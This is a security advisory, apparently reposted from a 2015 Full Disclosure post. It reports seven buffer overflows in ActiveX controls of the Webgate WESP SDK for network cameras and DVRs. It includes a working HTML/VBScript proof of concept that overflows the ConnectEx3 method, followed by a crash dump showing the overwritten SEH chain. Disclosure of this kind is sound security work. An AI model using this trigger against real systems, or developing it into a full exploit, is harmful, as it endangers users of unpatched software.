WESP SDK multiple Remote Code Execution Vulnerabilities

2015.02.24
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both network DVR and network camera. Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc http://www.webgateinc.com/wgi/eng/#2 http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow CompanyName WebgateInc FileDescription WESPConfig Module FileVersion 1, 6, 42, 0 InternalName WESPConfig LegalCopyright Copyright (C) 2004-2010 OriginalFileName WESPConfig.DLL ProductName WESPConfig Module ProductVersion 1, 6, 42, 0 ******************PoC for one of the above Vulnerabilities*********** <html> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <!-- targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll" prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )" memberName = "ConnectEx3" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" argCount = 8 --> <script language='vbscript'> arg1=1 arg2=String(1044, "A") arg3=1 arg4="defaultV" arg5="defaultV" arg6=1 arg7=1 arg8="defaultV" target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 </script> </html> ****************************** Stack trace for above PoC Exception Code: ACCESS_VIOLATION Disasm: 76ACD33D MOV CX,[EAX] Seh Chain: -------------------------------------------------- 1 41414141 Called From Returns To -------------------------------------------------- msvcrt.76ACD33D WESPPlayback.999539 WESPPlayback.999539 41414141 41414141 22E5E0 22E5E0 2F712C 2F712C 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Registers: -------------------------------------------------- EIP 76ACD33D EAX 41414141 EBX 039E0040 -> 009DF298 ECX E0551782 EDX 41414141 EDI 76AD4137 -> 8B55FF8B ESI 76ACD335 -> 8B55FF8B EBP 0022E56C -> 039E0020 ESP 0022E56C -> 039E0020 Block Disassembly: -------------------------------------------------- 76ACD333 NOP 76ACD334 NOP 76ACD335 MOV EDI,EDI 76ACD337 PUSH EBP 76ACD338 MOV EBP,ESP 76ACD33A MOV EAX,[EBP+8] 76ACD33D MOV CX,[EAX] <--- CRASH 76ACD340 INC EAX 76ACD341 INC EAX 76ACD342 TEST CX,CX 76ACD345 JNZ SHORT 76ACD33D 76ACD347 SUB EAX,[EBP+8] 76ACD34A SAR EAX,1 76ACD34C DEC EAX 76ACD34D POP EBP ArgDump: -------------------------------------------------- EBP+8 41414141 EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+20 00000829 EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Stack Dump: -------------------------------------------------- 22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................] 22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......] 22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............] 22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] 22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from vendor Best Regards, Praveen Darshanam

References:

http://seclists.org/fulldisclosure/2015/Feb/90


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top